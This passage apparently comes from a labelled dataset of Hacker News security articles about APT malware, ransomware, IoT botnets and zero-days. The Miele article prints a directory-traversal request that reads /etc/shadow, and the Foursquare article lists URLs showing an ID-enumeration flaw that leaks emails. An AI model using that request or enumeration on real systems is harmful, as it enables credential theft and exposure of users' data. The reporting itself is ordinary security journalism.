Hackers with access to the system used for connecting mobile networks across the world were able to gain access to Telegram messenger and email data of high-profile individuals in the cryptocurrency business. In what is believed to be a targeted attack, the hackers were after two-factor authentication (2FA) login codes delivered over the short messaging system of the victim's mobile phone provider.
What To Expect in 2021
It will be quite interesting to hear Cynet's perspective on what will unfold over the coming year. Ransomware shows no sign of abating, and attacks on third-party suppliers to gain access to their clients' environments will undoubtedly continue. A large remote workforce likely opens companies up to traditional social engineering attacks as well.
In terms of defensive actions, third party risk management will certainly be top of mind following the SolarWinds fiasco. Remote endpoints and remote workers will need to be better protected.
Automated response systems will certainly gain traction as reaction times to things like ransomware must accelerate to machine speed to prevent infections from propagating across the environment and locking up critical system assets. We're certainly in for a bumpy ride ahead. Look to cybersecurity experts steeped in protecting client organizations for insights and advice moving forward.
Register for this live webinar here
",Cyber_Attack
New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer,https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html,"A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.
The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous ""Royal Road"" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed ""PortDoor,"" according to Cybereason's Nocturnus threat intelligence team.
""Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,"" the researchers said in a write-up on Friday.
Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over 85% of submarines in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.
Content of the weaponized RTF document
Over the years, Royal Road has earned its place as a tool of choice among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's Equation Editor (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.
This newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of ""8.t,"" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called ""e.o"" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.
Said to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.
""The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,"" the researchers said.
",Cyber_Attack
ZeroCleare: New Iranian Data Wiper Malware Targeting Energy Sector,https://thehackernews.com/2019/12/zerocleare-data-wiper-malware.html,"Cybersecurity researchers have uncovered a new, previously undiscovered destructive data-wiping malware that is being used by state-sponsored hackers in the wild to target energy and industrial organizations in the Middle East.
Dubbed ZeroCleare, the data wiper malware has been linked to not one but two Iranian state-sponsored hacking groups—APT34, also known as ITG13 and Oilrig, and Hive0081, also known as xHunt.
A team of researchers at IBM who discovered the ZeroCleare malware says that the new wiper malware shares some high-level similarities with the infamous Shamoon, one of the most destructive malware families known for damaging 30,000 computers at Saudi Arabia's largest oil producer in 2012.
Just like the Shamoon wiper malware, ZeroCleare also uses a legitimate hard disk driver called 'RawDisk by ElDos' to overwrite the master boot record (MBR) and disk partitions of targeted computers running the Windows operating system.
Though EldoS driver is not signed, the malware still manages to run it by loading a vulnerable but signed Oracle's VirtualBox driver, exploiting it to bypass the signature checking mechanism and load the unsigned EldoS driver.
""To gain access to the device's core, ZeroCleare used an intentionally vulnerable [but signed VBoxDrv] driver and malicious PowerShell/Batch scripts to bypass Windows controls,"" the researchers said.
To deploy the Zerocleare malware on as many computers in an organization as possible, attackers' first attempt to brute force network accounts passwords and then install ASPX web shells, like China Chopper and Tunna, by exploiting a SharePoint vulnerability.
""Adding these living-off-the-land tactics to the scheme, ZeroCleare was spread to numerous devices on the affected network, sowing the seeds of a destructive attack that could affect thousands of devices and cause disruption that could take months to recover from fully,"" the researchers said.
The same threat actors also attempted to install legitimate remote access software called TeamViewer and used an obfuscated version of the Mimikatz credential-stealing tool to steal more network credentials of the compromised servers.
Though researchers haven't disclosed names of any targeted organizations, they did confirm that there are two versions of Zerocleare that have been seen in the wild, one for each Windows architecture (32-bit and 64-bit), but only the 64-bit works.
According to the researchers, the ZeroCleare attacks are not opportunistic and appear to be targeted operations against specific sectors and organizations.
""X-Force IRIS has been following a marked increase in destructive attacks in the past year, having logged a whopping 200 percent increase in the amount of destructive attacks in the past six months,"" the researchers said.
""Looking at the geographical region hit by the ZeroCleare malware, it is not the first time the Middle East has seen destructive attacks target its energy sector.""
",Malware
[Webinar] How Cyber Attack Groups Are Spinning a Larger Ransomware Web,https://thehackernews.com/2021/06/webinar-how-cyber-attack-groups-are.html,"Organizations today already have an overwhelming number of dangers and threats to look out for, from spam to phishing attempts to new infiltration and ransomware tactics. There is no chance to rest, since attack groups are constantly looking for more effective means of infiltrating and infecting systems.
Today, there are hundreds of groups devoted to infiltrating almost every industry, constantly devising more sophisticated methods to attack organizations.
It's even more troubling to note that some groups have started to collaborate, creating complex and stealthy tactics that leave even the best security teams scrambling to respond. Such is the case noted by XDR Provider Cynet, as the company observes in its newest Research Webinar (register here).
Cynet's research team noted that two of the most infamous attack groups – Lunar Spider and Wizard Spider – have started working together to infect organizations with ransomware.
The development is certainly troubling, and the report shows why security teams and professionals must constantly be looking at the whole picture, not just the result of an attack.
Combining attacks for greater impact
Cynet's researchers first noticed something was amiss as they were studying IcedID malware, developed by Lunar Spider. Originally observed in the wild in 2017, IcedID is a banking Trojan that has targeted the financial sectors in both the US and Europe. After it was initially revealed, Lunar Spider shifted IcedID's modus operandi to enable it to deploy additional payloads, such as Cobalt Strike.
The researchers also studied the CONTI ransomware, a relatively new attack approach developed by Wizard Spider that's already in the FBI's crosshairs. This ""ransomware-as-a-service"" (RaaS) has been spotted in the US and Europe and has already wreaked havoc on many organizations and networks.
Cynet first suspected the connection between the two organizations as it was exploring a case of CONTI ransomware that used many familiar tactics, though not ones traditionally deployed by the Wizard Spider group.
During the investigation, the team discovered that CONTI was being deployed through malware campaigns that used IcedID as an initial point of attack. After establishing persistence on targets' devices, IcedID deployed a CONTI ransomware variant to lock the network.
Understanding the risks
The new Cynet Research Webinar will dive deeper into the anatomy of this collaboration to explain why it's so troubling, but also how it can be detected and combatted. The webinar will discuss:
The background of the attack groups. Both Lunar Spider and Wizard Spider are well known and highly dangerous. Their existing malware and other tools are widely popular and present in many notable breaches and attacks. Before exploring their tools, the webinar will break down each group.
The increasing popularity of ransomware attacks. These tactics have become widespread and are expected to cost organizations hundreds of billions of dollars in the next decade. To truly comprehend how to combat this new attack tactic, it's worth establishing how ransomware works, and some common tactics.
The anatomy of a combined IcedID and CONTI attack. The webinar will break down a case study of this new attack tactic. Unlike some other ransomware attacks, this new method uses techniques from both to create persistence, avoid detection, and lock systems before organizations can react. Moreover, they're increasingly using ""double extortion"" methods, which both lock data and threaten leaks if payment isn't received.
You can register to the webinar here.
",Malware
Zero-Day Exploits for Stealing OS X and iOS Passwords,https://thehackernews.com/2015/06/iphone-password-hacking.html,"I think you'll agree with me when I say: Apple devices are often considered to be more safe and secure than other devices that run on platforms like Windows and Android, but a recent study will make you think twice before making this statement.
A group of security researchers have uncovered potentially deadly zero-day vulnerabilities in both iOS and OS X operating systems that could put iPhone/iPad or Mac owners at a high risk of cyber attacks.
Researchers have created and published a malicious app on the App Store that was able to siphon users' personal data from the password storing Keychain in Apple's OS X, as well as steal passwords from iCloud, banking and email accounts.
Dubbed XARA (cross-app resource access), the malware exploit app was able to bypass the OS X sandboxing mechanisms that are supposedly designed to prevent an app from accessing the credentials, contacts, and other important data related to other apps.
The Consequences are Dire!
In their paper, titled ""Unauthorized Cross-App Resource Access on MAC OS X and iOS"" [PDF], the researchers claim that once installed, their app can obtain data from applications such as Dropbox, Facebook and Evernote, along with the popular messaging app WeChat, and even siphon passwords from 1Password.
""The consequences are dire,"" researchers wrote in the paper. ""For example, on the latest Mac OS X 10.10.3, our sandboxed app successfully retrieved from the system's keychain the passwords and secret tokens of iCloud, email and all kinds of social networks...bank and Gmail passwords from Google Chrome.""
The Researchers also noted that the hack attack is only possible when the attributes of the victim's keychain item are predictable. However, most of the services share the same name across Keychain stores.
The Keychain issue stems from its inability to verify which app owns a credential in Keychain, and even the OS doesn't check for any suspicious activity.
Bypassed Apple's App Store Security Checks
The malicious app was also able to bypass the Apple's App store security checks that are designed to ensure one app can not gain access to other apps' data without permission.
However, the more worrisome part regarding the malicious app is that it was approved by Apple for placement in its App Store, which is supposed to be pre-examine by Apple security engineers for potentially malicious apps.
Apple did not immediately respond to a request for comment.
The zero-day flaws discovered by the Indiana University boffins Xing; Xiaolong Bai; XiaoFeng Wang; and Kai Chen joined Tongxin Li, of Peking University, and Xiaojing Liao, of Georgia Institute of Technology, was reported to Apple last October, but the company requested a 6 month period before making it public.
However, according to their paper, the issues persist and millions of Apple users can still be affected by these zero-day flaws.
How to Protect your Devices
A system-wide update to Apple's OS X and iOS is the only way to protect yourself fully against these vulnerabilities, the researchers said. However, we are patiently waiting to hear from Apple that how it's planning to resolve this huge issue.
To protect yourselves against such vulnerabilities, users of all operating system platforms are advised to limit the apps they install on their devices to those that are needed and explicitly trusted.
",Vulnerability
"Earn up to $15,000 for Hacking Microsoft Spartan Browser",https://thehackernews.com/2015/04/microsoft-project-spartan-browser-security.html,"If you're a bug hunter and love playing with codes than you could grab as much as US$15,000 from Microsoft for finding out vulnerabilities in its latest Project Spartan browser.
Yes, $15,000!
It seems like Redmond don't want to take a chance to let hackers and cyber criminals get their hands on the company's latest Windows 10 operating system.
On Wednesday, Microsoft announced that the company will be expanding its bug bounty program ahead of the release of Windows 10, which will include a two-month hunt for vulnerabilities in its new web browser, Project Spartan.
So, it's time for security researchers and hackers to earn extra cash from Microsoft.
For those who are unaware… What's Project Spartan?
Project Spartan is Microsoft's project for its new web browser to replace the oldest Internet Explorer from its Windows operating system.
Though the project is still very much under the developmental stage, Microsoft is making every effort to make Spartan better and better as a browser.
The day Microsoft launched this project till now, the browser has received as much steady stream of improvements as it could give a tough competition to Google's Chrome web browser.
As it is said, the first impression is the last impression. Therefore, the technology giant is offering several payout categories which starts from $500 and ends with the top reaching bug bounty amount of $15,000 (11,000 Euro) for eligible vulnerabilities in Spartan, which includes…
…Remote Code Execution (RCE) bugs, Sandbox Escapes as well as design-level security bugs.
You have time beginning today till June 22, 2015 to submit your bug reports to the company. So don't be late.
Also, those hackers and researchers who submitted vulnerability reports since the beginning of 2015 would also be rewarded if the discovered vulnerabilities meet the eligibility criteria.
This new bug bounty program also offers payouts for vulnerabilities in Microsoft's Azure cloud platform, and Sway Web application tool, Jason Shirk of Microsoft's Security Response Center says in a blog post.
The bug bounty offer for Azure will cover cloud services, virtual machines, Active Directory, storage and much more.
Microsoft is also offering up to $100,000 USD to bypass active mitigations (such as ASLR and DEP) in the company's latest released version of the operating system, and ""a bonus of up to $50,000 USD for actionable defense techniques to the reported bypass,"" Microsoft says.
So play, discover and submit your findings by including all your details in an email to secure@microsoft.com based on the company's requirements on this page.
",Vulnerability
Hackers Exploit BlackBerry Browser Bug !,https://thehackernews.com/2011/03/hackers-exploit-blackberry-browser-bug.html,"Research in Motion has found a security flaw and recommended that user disable JavaScript in browsers on certain phones, threatening the BlackBerry maker's iron-clad reputation for security.
""The issue could result in remote code execution on affected BlackBerry smartphones,"" the Waterloo, Ontario-based company said. ""Successful exploitation of the vulnerability requires the user to browse to a website that the attacker has maliciously designed.""
The flaw is in the WebKit browser that RIM includes in version 6 of its BlackBerry OS.
RIM said hackers can steal data from users' memory cards on some BlackBerry devices. They can also install malware by exploiting the hole, but the company said that even if attacked, the phone's emails and contacts would be safe.
The publicity is particularly bad for the company who stakes its reputation on the security and privacy of its service. RIM, which has been forced to use more third-party software to compete with the flashy features of other platforms, provides more targets to hack.
The vulnerability was discovered at the ""Pwn2Own"" hacking contest last week. Although the contest winners were not allowed to publicize specifics of the vulnerabilities until companies have patched them, it's possible that malware authors are already aware of it.
An iPhone 4 was also hacked during the contest.
The contest could actually help RIM, though, if it drives focus on security. According to the coders who discovered the flaw, RIM's smartphone software doesn't make use of some important security techniques, and the company is heavily reliant on ""security by obscurity,"" the fallible strategy of hiding how software works to keep hackers at bay.
",Malware
Cyber Attack Knocks Nearly a Million Routers Offline,https://thehackernews.com/2016/11/mirai-router-offline.html,"Mirai Botnet is getting stronger and more notorious each day that passes by. The reason: Insecure Internet-of-things Devices.
Last month, the Mirai botnet knocked the entire Internet offline for a few hours, crippling some of the world's biggest and most popular websites.
Now, more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany knocked offline over the weekend following a supposed cyber-attack, affecting the telephony, television, and internet service in the country.
The German Internet Service Provider, Deutsche Telekom, which offers various services to around 20 Million customers, confirmed on Facebook that as many as 900,000 customers suffered internet outages on Sunday and Monday.
Millions of routers are said to have vulnerable to a critical Remote code Execution flaw in routers made by Zyxel and Speedport, wherein Internet port 7547 open to receive commands based on the TR-069 and related TR-064 protocols, which are meant to use by ISPs to manage your devices remotely.
The same vulnerability affects Eir D1000 wireless routers (rebranded Zyxel Modem) deployed by Irish internet service provider Eircom, while there are no signs that these routers are actively exploited.
According to Shodan search, around 41 Million devices leave port 7547 open, while about 5 Million expose TR-064 services to the outside world.
According to an advisory published by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploit code every 5-10 minutes for each target IP.
An intercepted packet showed how a remote code execution flaw in the part of a SOAP request was used to download and execute a file in order to infect the vulnerable device.
Security researchers at BadCyber also analyzed one of the malicious payloads that were delivered during the attacks and discovered that the attack originated from a known Mirai's command-and-control server.
""The unusual application of TR-064 commands to execute code on routers has been described for the very first time at the beginning of November, and a few days later a relevant Metasploit module had appeared,"" BadCyber wrote in a blog post. ""It looks like someone decided to weaponize it and create an Internet worm based on Mirai code.""
It all started early October when a cyber criminal publicly released the source code of Mirai, a piece of nasty IoT malware designed to scan for insecure IoT devices – mostly routers, cameras, and DVRs – and enslaves them into a botnet network, which is then used to launch DDoS attacks.
The hacker created three separate exploit files in order to infect three different architectures: two running different types of MIPS chips and one with ARM silicon.
The malicious payloads open the remote administration interface and then attempt to log in using three different default passwords. After this is done, the exploit then closes port 7547 in order to prevent other attackers from taking control of the infected devices.
""Logins and passwords are obfuscated (or ""encrypted"") in the worm code using the same algorithm as does Mirai,"" the researchers say. ""The C&C server resides under timeserver.host domain name, which can be found on the Mirai tracker list.""
More in-depth technical details about the vulnerability can be found on ISC Sans, Kaspersky Lab, and Reverse Engineering Blog.
Deutsche Telekom has issued an emergency patch for two models of its Speedport broadband routers – Speedport W 921V, Speedport W 723V Type B – and currently rolling out firmware updates.
The company recommends its customers to power down their routers, wait for 30 seconds and then restart their routers in an attempt to fetch the new firmware during the bootup process.
If the router fails to connect to the company's network, users are advised to disconnect their device from the network permanently.
To compensate the downtime, the ISP is also offering free Internet access through mobile devices to the affected customers until the technical problem is resolved.
",Cyber_Attack
How Just Opening A Malicious PowerPoint File Could Compromise Your PC,https://thehackernews.com/2017/08/powerpoint-malware-ms-office.html,"A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office.
The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface for which a patch was issued in April this year, but threat actors are still abusing the flaw through the different mediums.
Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file.
According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.
Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department.
Here's How the Attack Works:
The complete attack scenario is listed below:
Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request.
Step 2: Once executed, the PPSX file calls an XML file programmed in it to download ""logo.doc"" file from a remote location and runs it via the PowerPoint Show animations feature.
Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system.
Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely.
Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone.
Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well.
The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.
",Cyber_Attack
Lazarus APT Hackers are now using BMP images to hide RAT malware,https://thehackernews.com/2021/04/lazarus-apt-hackers-are-now-using-bmp.html,"A spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote access trojan (RAT) capable of stealing sensitive information.
Attributing the attack to the Lazarus Group based on similarities to prior tactics adopted by the adversary, researchers from Malwarebytes said the phishing campaign started by distributing emails laced with a malicious document that it identified on April 13.
""The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format,"" Malwarebytes researchers said.
""The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commands/shellcode as well as perform exfiltration and communications to a command and control server.""
Created on March 31, 2021, the lure document (in Korean) purports to be a participation application form for a fair in one of the South Korean cities and prompts users to enable macros upon opening it for the first time, only to execute the attack code that triggers the infection chain, ultimately dropping an executable called ""AppStore.exe.""
The payload then proceeds to extract an encrypted second-stage payload appended to itself that's decoded and decrypted at run time, followed by establishing communications with a remote server to receive additional commands and transmit the results of those commands back to the server.
""The Lazarus threat actor is one of the most active and sophisticated North Korean threat actors that has targeted several countries including South Korea, the U.S., and Japan in the past couple of years,"" the researchers said. ""Lazarus is known to employ new techniques and custom toolsets in its operations to increase the effectiveness of its attacks.""
",Malware
Internet-Connected Medical Washer-Disinfector Found Vulnerable to Hacking,https://thehackernews.com/2017/03/iot-washer-disinfector.html,"Internet-of-Things devices are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices.
There are, of course, some really good reasons to connect certain devices to the Internet. For example, remotely switching on your A/C a few minutes before you enter your home, instead of leaving it blasting all day.
But does everything need to be connected?
Of course, not. One such example is the latest bug report at Full Disclosure, affecting an Internet-connected washer-disinfector appliance by Germany-based manufacturer Miele.
The Miele Professional PG 8528 appliance, which is used in medical establishments to clean and properly disinfect laboratory and surgical instruments, is suffering from a Web Server Directory Traversal vulnerability.
Jens Regel of German consultancy Schneider & Wulf has discovered the flaw (CVE-2017-7240) that allows an unauthenticated, remote attacker to access directories other than those needed by a web server.
Once accessed, the attacker can steal sensitive information stored on the server and even insert their own malicious code and tell the web server to execute it.
""The corresponding embedded web server 'PST10 WebServer' typically listens to port 80 and is prone to a directory traversal attack, [and] therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aid in subsequent attacks,"" Regel explained.
Proof-of-Concept Exploit Code Released!
Regel also published proof-of-concept (PoC) exploit code for this vulnerability, which means hackers can now exploit the vulnerability before the vendor issue a patch.
The PoC exploit is simple for anyone to run:
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.
It's unclear which libraries Miele used to craft the Web server, though, according to Regel, he's able to request the embedded system's shadow file – and by extension any file on the filesystem.
The researcher privately disclosed the vulnerability to Miele in November 2016, but did not hear back from the vendor for more than three months. So, it when a fix can be expected (or if it exists) is still unknown.
Therefore, the best option to keep yourself secure is to disconnect the appliance from the Internet for the time being until the patch is released.
",Vulnerability
Foursquare vulnerability that exposes 45 million users' email addresses,https://thehackernews.com/2014/01/foursquare-vulnerability-that-exposes.html,"A location based Social Networking platform with 45 million users,'Foursquare' was vulnerable to the primary email address disclosed.
Foursquare is a Smartphone application that gives you details of nearby cafes, bars, shops, parks using GPS location and also tells about your friends nearby.
According to a Penetration tester and hacker 'Jamal Eddine', an attacker can extract email addresses of all 45 million users just by using a few lines of scripting tool.
Basically the flaw exists in the Invitation system of the Foursquare app. While testing the app, he found that invitation received on the recipient's end actually disclosing the sender's email address, as shown above.
Invitation URL:
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=64761059&sig=mmlx96RwGrQ2fJAg4OWZhAWnDvc%3D
Where 'uid' parameter represents the sender's profile ID.
Hacker noticed that the parameter in the Invitation URL can be modified in order to spoof the sender profile i.e. Just by modifying the value of 'uid' parameter, one can see the email ID of the respective user.
If someone is a good programmer, then dumping the complete database won't be a difficult task.
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=35
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=60
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=65
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=4444
And so forth...
The same question still persist that what can be done if someone knows my name and my email id? Many of us use same mail account on all of the social networking sites i.e. Primary email address, and if your personal email address gets leaked from any of the website, someone can start sending you spam, malware or phishing attempts.
I think you don't want to be phished by any hacking group like Syrian Electronic hacker or this information can easily aid other cyber attacks.
In July, 2013, Similar vulnerability was reported on Facebook, discloses the primary email address of any Facebook user to hackers and spammers.
As a responsible bug hunter, he reported the flaw to Foursquare's Security Team, and they have finally fixed the issue.
",Data_Breaches
Facebook Self-XSS Scam Fools Users into Hacking Themselves,https://thehackernews.com/2014/07/facebook-self-xss-scam-fools-users-into_28.html,"Scammers have again targeted more than one billion active users of the popular social networking giant Facebook, to infect as many victims as possible.
Not by serving fake post, neither by providing malicious video link, instead this time scammers have used a new way of tricking Facebook users into injecting or placing malicious JavaScript or client-side code into their web browsers.
This malicious code could allow an attacker to gain access to victims' accounts, thereby using it for fraud, to send spams, and promoting further attacks by posting the scam on timeline to victims' friends. This technique is known as Self Cross-site Scripting or Self XSS.
Self-XSS (Self Cross-Site Scripting) scam is a combination of social engineering and a browser vulnerability, basically designed to trick Facebook users' into providing access to their account. Once an attacker or scammer gets access to users' Facebook account, they can even post and comment on things on users' behalf.
In order to infect Facebook user, the cyber crooks send a phishing message via an email or a Facebook post from one of the friends in the list of the targeted victim claiming, in this case, a way to hack any Facebook user by following some simple steps.
The posted scam looks as follows:
Hack any Facebook account following these steps:
1. Go to the victim's profile
2. Click right click then click on inspect element and click the ""Console"" tab.
3. Paste the code into the box at the bottom and press Enter.
The code is in the web site: https://textuploader .com****/
Good luck: *
Don't hurt anybody…
They want you to follow the given instructions by copy and pasting the malicious code, as given in the above instructions, for taking over someone else's account. The trick is suitable for both Google Chrome and Mozilla Firefox users.
Once you self inject this malicious script to your account, it will give away the access of your whole account to the one who could do a variety of malicious activities, basically spreading all sorts of malicious campaigns. The hackers can also infect victim's computer with malware that can collect banking details and send them to a remote location controlled by them.
Facebook has also listed the scam on the list of threats its users have been observed to fall victim to. ""Scammers who use Self-XSS usually trick you by promising to help you hack somebody else's account,"" reads the post. ""The scammer's goal is to get you to run their malicious code on your computer. When you run their code, you grant the scammer access to your account for fraud, spam, and tricking more people into running the scam.""
Spotting these scams and reporting them are the best way to protect yourself, but if you fall victim to one of these attacks, don't panic! Follow the link to learn more about protecting your Facebook account.
Facebook is also working with various browser vendors to add protection in the browser in an effort to prevent this vector from being exploited.
",Vulnerability
Hackers Exploit Unpatched Windows XML vulnerability,https://thehackernews.com/2012/06/hackers-exploit-unpatched-windows-xml.html,"Hackers Exploit Unpatched Windows XML vulnerability
An unpatched vulnerability in the Microsoft XML Core Services (MSXML) is being exploited in attacks launched from compromised websites to infect computers with malware. This zero-day exploit that potentially affects all supported versions of Microsoft Windows, and which has been tied to a warning by Google about state-sponsored attacks, has been identified carrying out attacks in Europe.
Microsoft security bulletin MS12-037 was this month's cumulative update for Internet Explorer. It is rated as Critical, and addresses 14 separate vulnerabilities that affect every supported version of Internet Explorer in some way.One vulnerability in particular is more urgent than the rest, though. There are multiple attacks circulating online that target CVE-2012-1875.The name of the vulnerability is ""Same ID Property Remote Code Execution Vulnerability"", which doesn't really explain much.
Until a patch is released, the Microsoft workaround is the only way to stymie hackers. Many security vendors have updated their products to detect malicious code that tries to exploit the vulnerability. Exploit code that works on all versions of Internet Explorer on Windows XP, Vista and 7 has been added to the Metasploit penetration testing framework.
Microsoft has provided a temporary fix for the vulnerability that all Windows users should apply whether or not they use IE as their browser of choice. Most antivirus products have added signatures to detect and block exploits.
In addition, you can also run the Fix-It tool from Microsoft. The automated tool implements measures to block the attack vector used to exploit this vulnerability.
",Vulnerability
New Linux Malware Exploits SambaCry Flaw to Silently Backdoor NAS Devices,https://thehackernews.com/2017/07/linux-malware-sambacry.html,"Remember SambaCry?
Almost two months ago, we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software, allowing a hacker to remotely take full control of a vulnerable Linux and Unix machines.
We dubbed the vulnerability as SambaCry, because of its similarities to the Windows SMB vulnerability exploited by the WannaCry ransomware that wreaked havoc across the world over two months ago.
Despite being patched in late May, the vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances, researchers at Trend Micro warned.
For those unfamiliar: Samba is open-source software (re-implementation of SMB/CIFS networking protocol), which offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems, including Linux, UNIX, IBM System 390, and OpenVMS.
Shortly after the public revelation of its existence, the SambaCry vulnerability (CVE-2017-7494) was exploited mostly to install cryptocurrency mining software—""CPUminer"" that mines ""Monero"" digital currency—on Linux systems.
However, the latest malware campaign involving SambaCry spotted by researchers at Trend Micro in July mostly targets NAS devices used by small and medium-size businesses.
SHELLBIND Malware Exploits SambaCry to Targets NAS Devices
Dubbed SHELLBIND, the malware works on various architectures, including MIPS, ARM and PowerPC, and is delivered as a shared object (.SO) file to Samba public folders and loaded via the SambaCry vulnerability.
Once deployed on the targeted machine, the malware establishes communication with the attackers' command and control (C&C) server located in East Africa, and modifies firewall rules to ensure that it can communicate with its server.
After successfully establishing a connection, the malware grants the attackers access to the infected device and provides them with an open command shell in the device, so that they can issue any number and type of system commands and eventually take control of the device.
In order to find the affected devices that use Samba, attackers can leverage the Shodan search engine and write the original malware files to their public folders.
""It is quite easy to find devices that use Samba in Shodan: searching for port 445 with a 'samba' string will turn up a viable IP list,"" researchers said while explaining the flaw.
""An attacker would then simply need to create a tool that can automatically write malicious files to every IP address on the list. Once they write the files into the public folders, the devices with the SambaCry vulnerability could become ELF_SHELLBIND.A victims.""
However, it is not clear what the attackers do with the compromised devices and what's their actual motive behind compromising the devices.
The SambaCry vulnerability is hell easy to exploit and could be used by remote attackers to upload a shared library to a writable share and then cause the server to load and execute the malicious code.
The maintainers of Samba already patched the issue in Samba versions 4.6.4/4.5.10/4.4.14, so you are advised to patch your systems against the vulnerability as soon as possible.
Just make sure that your system is running updated Samba version.
Also, attackers need to have writable access to a shared location on the target system to deliver the payload, which is another mitigating factor that might lower the rate of infection.
",Malware
Malicious Infrared X-Ray Android app infecting users in Japan,https://thehackernews.com/2013/03/malicious-infrared-x-ray-android-app.html,"Researchers are already warning that malware authors developing more sophisticated attack techniques for mobile devices, using encryption and randomization or hiding malicious code in image files.
As analyzed by Symantec a malicious Infrared X-Ray Android application, attempting to lure Android device owners to download an app that supposedly allows the camera on the device to see through clothes.
This malware app is spreading quickly widely in Japan by sending the spam messages via SMS to phone numbers stored in the device's Contacts, so that the recipients of the spam to be tricked easier because the invitation to download the app is coming from someone they know rather than from an unknown sender.
The app is designed to steals all details in the device's contact list and are uploaded to a predetermined server.
Symantec confirmed that there are several variants of this app exist, ""..the latest variants have added an interesting payload: rather than sending SMS messages to the victim's friends and family, the ultimate goal is to scam the victim with something similar to what is called one-click fraud in Japan"" Hamada said on blog.
Moreover, in order to make it difficult for the victim to uninstall the app, it removes itself from the launcher after it is initially executed, although it can be removed in Applications under Settings.
Researchers suggest to refrain from clicking links found in messages such as emails and SMS messages from unknown senders as well as suspicious messages from known senders.
",Malware
Update your Mac OS X — Apple has released Important Security Updates,https://thehackernews.com/2016/09/apple-mac-os-x-update.html,"If you own a Mac laptop or desktop, you need to update your system right now.
It turns out that the critical zero-day security vulnerabilities disclosed last week, which targeted iPhone and iPad users, affect Mac users as well.
Late last week, Apple rolled out iOS 9.3.5 update to patch a total of three zero-day vulnerabilities that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link.
Dubbed ""Trident,"" the security holes were used to create spyware (surveillance malware) called 'Pegasus' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates.
Pegasus could allow an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user's location, microphone.
Pegasus Spyware could even allow an attacker to fully download victim's passwords and steal the stored list of WiFi networks, as well as passwords the device connected to.
Apple is now patching the same ""Trident"" bugs in Safari web browser on its desktop operating system, with urgent security updates for Safari 9 as well as OS X Yosemite and OS X El Capitan.
However, this is not a surprise because iOS and OS X, and mobile and desktop version of Safari browser share much of the same codebase. Therefore, zero-days in Apple's iOS showed up in OS X as well.
Pegasus exploit takes advantage of Trident bugs to remotely jailbreak and install a collection of spying software onto a victim's device, without the user's knowledge.
